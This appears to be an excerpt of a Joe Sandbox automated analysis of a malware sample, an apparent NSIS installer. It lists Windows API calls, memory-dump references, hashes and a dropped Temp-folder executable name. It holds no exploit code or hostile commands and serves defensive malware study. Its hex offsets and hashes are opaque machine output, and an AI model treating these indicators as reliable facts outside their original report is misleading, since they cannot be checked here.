                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3521207402-0
                                                                                                                                                                  • Opcode ID: 75abc50d8bbcae5e6b42e16a9c5e18dcc4f34aedb3b9b3b6b4535c28acb83f60
                                                                                                                                                                  • Instruction ID: 8d0e1338582c57ad2e0f1769eab3c7df609e54171dd7408d793955ea23100c16
                                                                                                                                                                  • Opcode Fuzzy Hash: 75abc50d8bbcae5e6b42e16a9c5e18dcc4f34aedb3b9b3b6b4535c28acb83f60
                                                                                                                                                                  • Instruction Fuzzy Hash: 18015732D04105EBDF21AFA5D945AEE7AB1AF00344F50813BF905B51E1C7B85A819A9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                                                                    • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                                                                                                                                                    • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                                                                                                    • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                                                                  • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                                                                                                                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 004058A2
                                                                                                                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                                                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                                                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00403366,00000020), ref: 0040354B
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\, xrefs: 0040355F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\
                                                                                                                                                                  • API String ID: 2962429428-3773954278
                                                                                                                                                                  • Opcode ID: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
                                                                                                                                                                  • Instruction ID: 2a7e143eeb5ff15eabc1b2b6f8d0cbcee59997853ce735810823953bb5f53fb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
                                                                                                                                                                  • Instruction Fuzzy Hash: D3C01230544600B6C2247F789E4F7193A186741337B900725F170B10F3D73C6A41552E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                                                                                                                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405895
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                                                                  • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                                                                                                                                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                                                                  • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405406
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                                                                  • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                                                                                                                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                                                                  • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                                                                  • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                                                                                                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                                                                  • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,00014DE4), ref: 004030F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                                                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404826
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404872
                                                                                                                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404885
                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00404E03), ref: 0040489F
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                                                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                                                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                                                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004048FF
                                                                                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                                                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                                                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404A39
                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A47
                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                                                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                                                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                                                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                                                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                                                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404C44
                                                                                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                                                                                                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                                                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404DE5
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404DEC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                  • String ID: $ mo$I|o$M$N
                                                                                                                                                                  • API String ID: 1638840714-2060548473
                                                                                                                                                                  • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                                                                                                  • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                                                                                                                                  • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                                                                                                  • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405050
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040505F
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040509C
                                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004050A4
                                                                                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                                                                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                                                                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405161
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                                                                                                                                                                    • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051B3
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405238
                                                                                                                                                                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0040527B
                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004052A3
                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405318
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040532B
                                                                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405362
                                                                                                                                                                  • CloseClipboard.USER32 ref: 00405368
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                  • String ID: mo${
                                                                                                                                                                  • API String ID: 590372296-3139121864
                                                                                                                                                                  • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                                                                                                  • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                                                                                                  • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                                                                                                  • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404310
                                                                                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                                                                                                  • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                                                                                                  • lstrcmpiA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,0042A0A0), ref: 00404428
                                                                                                                                                                  • lstrcatA.KERNEL32(?,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ), ref: 00404434
                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                                                                                                                                                                    • Part of subcall function 0040546C: GetDlgItemTextA.USER32(?,?,00000400,0040447D), ref: 0040547F
                                                                                                                                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                                                                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                                                                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                                                                                                    • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
